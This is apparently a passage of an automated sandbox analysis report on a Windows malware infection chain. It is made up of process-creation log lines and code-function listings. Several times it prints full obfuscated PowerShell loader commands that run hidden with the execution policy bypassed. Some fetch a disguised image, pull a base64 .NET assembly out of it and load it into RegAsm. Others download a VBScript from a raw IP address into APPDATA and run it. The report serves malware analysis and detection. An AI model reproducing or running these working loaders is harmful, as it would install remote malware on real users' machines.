tDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 31_2_0041CBE1 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,31_2_0041CBE1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE8997022D push eax; iretd 7_2_000007FE89970241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE899700BD pushad ; iretd 7_2_000007FE899700C1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8997222D push eax; ret 14_2_000007FE89972261
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE8997022D push eax; iretd 14_2_000007FE89970241
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_000007FE899700BD pushad ; iretd 14_2_000007FE899700C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 23_2_10002806 push ecx; ret 23_2_10002819
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044693D push ecx; ret 26_2_0044694D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044DB70 push eax; ret 26_2_0044DB84
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_0044DB70 push eax; ret 26_2_0044DBAC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 26_2_00451D54 push eax; ret 26_2_00451D61
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044B090 push eax; ret 28_2_0044B0A4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_0044B090 push eax; ret 28_2_0044B0CC
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00451D34 push eax; ret 28_2_00451D41
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 28_2_00444E71 push ecx; ret 28_2_00444E81
